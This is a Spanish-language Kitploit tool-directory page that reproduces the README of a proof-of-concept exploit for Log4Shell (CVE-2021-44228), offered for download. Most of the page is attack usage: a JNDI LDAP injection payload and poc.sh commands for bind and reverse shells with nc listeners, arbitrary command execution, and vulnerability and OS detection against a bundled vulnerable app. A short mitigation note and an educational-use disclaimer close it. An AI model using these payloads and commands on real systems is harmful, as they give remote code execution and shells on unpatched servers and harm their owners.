Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-44228-PoC — Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con servidores HTTP y LDAP, que admite shells inversas y enlazadas, RCE y detección basada en tiempo para uso educativo. | Kitploit
Herramientas/GitHubGitHub/thearqsz/cve-2021-44228-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubthearqsz/cve-2021-44228-poc

CVE-2021-44228-PoC

Exploit de prueba de concepto para CVE-2021-44228 (Log4Shell) con servidores HTTP y LDAP, que admite shells inversas y enlazadas, RCE y detección basada en tiempo para uso educativo.

Ver Repositorio
2hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228 PoC

PoC para CVE-2021-44228.

Proyecto creado SOLO CON FINES EDUCATIVOS.

Servidor del exploit

Este proyecto crea dos servidores: http y ldap. Ambos son necesarios para que el exploit funcione. El archivo java especificado se compila y los servidores se inician en el Dockerfile. El payload se muestra al usuario; debe pasarse a la aplicación vulnerable.

Payload de ejemplo:

root@kitploit:~
${jndi:ldap//127.0.0.1:1389/a}

¿Cómo ejecutarlo?

  • Shell enlazada
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e bind --remote-port 4445
  • Shell inversa
root@kitploit:~
nc -lvnp 4444
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e reverse --listener-port 4444
  • RCE
root@kitploit:~
./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e rce --cmd 'ls | tee log.txt'
  • Detección de vulnerabilidad basada en tiempo
  • Hace que el programa se detenga durante 25 segundos

    root@kitploit:~
    ./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e vulndetect
    
    • Detección de sistema operativo
    root@kitploit:~
    nc -lvnp 4444
    ./poc.sh -i 127.0.0.1 -l 1234 -t 8080 -e osdetect --listener-port 4444
    

    La detección de sistema operativo puede devolver 4 letras:

    • L para Linux
    • W para Windows
    • M para MacOS
    • U para desconocido

    Bypass

    Se publicó una técnica de bypass. Ejemplo aquí

    Aplicación vulnerable

    La aplicación fue diseñada para mostrar cómo funciona. Para compilar y ejecutar el jar con una aplicación usa:

    root@kitploit:~
    ./build_vuln_app.sh
    java -jar vulnapp/target/vulnapp.jar 'PAYLOAD'
    

    donde PAYLOAD es lo que devuelve el script ./poc.sh (p. ej. ${jndi:ldap://127.0.0.1:1389/1}).

    Créditos

    Algunos créditos para proyectos y sitios web que se usaron durante la creación de este exploit:

    • https://github.com/shanfenglan/apache_log4j_poc
    • https://github.com/ivan-sincek/java-reverse-tcp
    • https://www.lunasec.io/docs/blog/log4j-zero-day/
    • https://github.com/RandomRobbieBF/marshalsec-jar

    ¿Cómo protegerte?

    Inicia la aplicación usando log4j con log4j2.formatMsgNoLookups establecido en true, o actualiza a log4j-2.15.0-rc1 o posterior. Las actualizaciones ya están disponibles; impleméntalas lo antes posible.

    Descargo de responsabilidad

    Este proyecto solo puede usarse con fines educativos. Usar este software contra sistemas objetivo sin permiso previo es ilegal, y el autor no será responsable de los daños derivados del mal uso de este software.

    Descargar herramienta